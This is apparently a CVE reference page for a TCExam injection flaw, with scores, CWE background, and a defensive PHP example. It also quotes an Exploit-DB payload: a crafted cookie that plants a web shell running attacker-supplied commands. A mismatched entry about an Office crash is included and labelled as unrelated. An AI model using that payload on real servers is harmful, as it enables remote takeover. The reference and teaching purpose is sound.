CVE-2007-2431
Published: 2007-05-02
Priority: P429 · Severity: medium · CVSS 2.0 base score: 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit indexed (see Exploit-DB below)
EPSS: 5.10% (91.3 percentile)
Dynamic variable evaluation vulnerability in shared/config/tce_config.php in TCExam 4.0.011 and earlier allows remote attackers to conduct cross-site scripting (XSS) and possibly other attacks by modifying critical variables such as $_SERVER, as demonstrated by injecting web script via the _SERVER[SCRIPT_NAME] parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tecnick.com | tcexam | <= 4.0.011 | — |
No detection rules found.
Exploit-DB
CVE-2015-2431 Microsoft Office 2007 - 'OGL.dll' DpOutputSpanStretch::OutputSpan Out of Bounds Write (MS15-080)
exploitdb · 2015-08-21
(Note: this entry concerns CVE-2015-2431, a different vulnerability unrelated to TCExam or CVE-2007-2431.)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=420&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0x4A45. OffViz identified this offset as OLESSRoot.DirectoryEntries[100].OLESSDirectoryEntry[20].sidLeft with an original value of 0x00000000 and a fuzzed value of 0x00008000.
Attached files:
Fuzzed minimized PoC: 1863274449_min.doc
Fuzzed non-minimized PoC: 1863274449_crash.doc
Original non-fuz
Exploit-DB
CVE-2007-2431 TCExam 4.0.011 - 'SessionUserLang' Shell Injection
exploitdb · 2007-04-29
---
```php
$this->resource = array();
// set selected language
$this->language = strtoupper($language);
// set filename for cache
$this->cachefile = $cachefile;
if (file_exists($this->cachefile)) {
    // read data from cache
    require_once($this->cachefile);
    $this->resource = $tmx;
} else {
    if (!empty($this->cachefile)) {
        // open cache file
        file_put_contents($this->cachefile, "getResource(); // language array
```
...
You can pass a specially crafted 'SessionUserLang' cookie to create a new file in the /cache folder
and inject a newline and some PHP code inside it, e.g.:
...
Cookie: SessionUserLang=%2F..%2F%0Asystem%28%24_GET%5BCMD%5D%29%3B%3F%3E%23%2F..%2Fsuntzu;
...
A new file called suntzu.php like this is created in the /cache folder:
#/../suntzu
// DATE: 2007-
No writeups or analysis indexed.
CWE
CWE-914: Improper Control of Dynamically-Identified Variables
mitre_cwe · MEDIUM · 6.4
The product does not properly restrict reading from or writing to dynamically-identified variables.
Many languages offer powerful features that allow the programmer to access arbitrary variables that are specified by an input string. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can modify unintended variables that have security implications.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity. Impact: Modify Application Data. An attacker could modify sensitive data or program variables.
Scope: Integrity. Impact: Execute Unauthorized Code or Commands.
Scope: Other, Integrity. Impact: Varies by Context, Alter Exec
CWE
CWE-627: Dynamic Variable Evaluation
mitre_cwe · MEDIUM · 6.4
In a language where the user can influence the name of a variable at runtime, if the variable names are not controlled, an attacker can read or write to arbitrary variables, or access arbitrary functions.
The resultant vulnerabilities depend on the behavior of the application, both at the crossover point and in any control/data flow that is reachable by the related variables or functions.
Background: Many interpreted languages support the use of a "$$varname" construct to set a variable whose name is specified by the $varname variable. In PHP, these are referred to as "variable variables." Functions might also be invoked using similar syntax, such as $$funcname(arg1, arg2).
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Co
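The dynamic-variable import that the CVE description and the two CWE entries above describe, as an added example that is not TCExam's code or the page's own: a hypothetical register_globals-style loop that lets a request key named `_SERVER` overwrite the superglobal, beside a hardened import that allowlists variable names and escapes the value on output. The request array, function names and allowlist are constructed for illustration.

```php
<?php
// Added example (not TCExam's own code): the CWE-627 / CWE-914 pattern behind
// CVE-2007-2431, reduced to a stand-alone script. Constructed request: PHP
// decodes the query key "_SERVER[SCRIPT_NAME]" into
// $_GET['_SERVER'] = ['SCRIPT_NAME' => ...], which this array emulates.
$request = [
    'lang'    => 'EN',
    '_SERVER' => ['SCRIPT_NAME' => '"><injected>'],  // attacker picks the name AND the value
];

// VULNERABLE: register_globals-style import. Each request key becomes the name
// of a global variable (same effect as $$name = $value at file scope), so the
// key "_SERVER" silently replaces the superglobal.
function importRequestUnsafe(array $request): void
{
    foreach ($request as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// HARDENED: only allowlisted names are accepted, names starting with "_" (the
// superglobals) and non-string values are refused, and nothing is written into
// the global symbol table; callers read from the returned array instead.
const ALLOWED_REQUEST_VARS = ['lang'];
function importRequestSafe(array $request): array
{
    $imported = [];
    foreach ($request as $name => $value) {
        $name = (string) $name;
        if (!is_string($value) || substr($name, 0, 1) === '_' || !in_array($name, ALLOWED_REQUEST_VARS, true)) {
            continue;
        }
        $imported[$name] = $value;
    }
    return $imported;
}

// Output side: SCRIPT_NAME is escaped where it is embedded in HTML, so even a
// poisoned value cannot break out of the attribute.
function formActionTag(): string
{
    $script = $_SERVER['SCRIPT_NAME'] ?? '';
    return '<form action="' . htmlspecialchars($script, ENT_QUOTES, 'UTF-8') . '">';
}

$before = $_SERVER['SCRIPT_NAME'] ?? '';
importRequestUnsafe($request);
echo "unsafe import: SCRIPT_NAME changed from '$before' to '{$_SERVER['SCRIPT_NAME']}'\n";
echo "escaped output: ", formActionTag(), "\n";   // the injected quote and angle brackets are entity-encoded
$_SERVER['SCRIPT_NAME'] = $before;                 // restore before running the safe path
var_dump(importRequestSafe($request));             // only ['lang' => 'EN'] survives
```

Run it from the CLI with `php script.php`; the first echo shows the superglobal being replaced, the var_dump shows the allowlist dropping the `_SERVER` key entirely.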
References:
http://secunia.com/advisories/25008
http://sourceforge.net/forum/forum.php?forum_id=690912
http://www.attrition.org/pipermail/vim/2007-May/001572.html
http://www.securityfocus.com/bid/23704
https://exchange.xforce.ibmcloud.com/vulnerabilities/33957
https://www.exploit-db.com/exploits/3816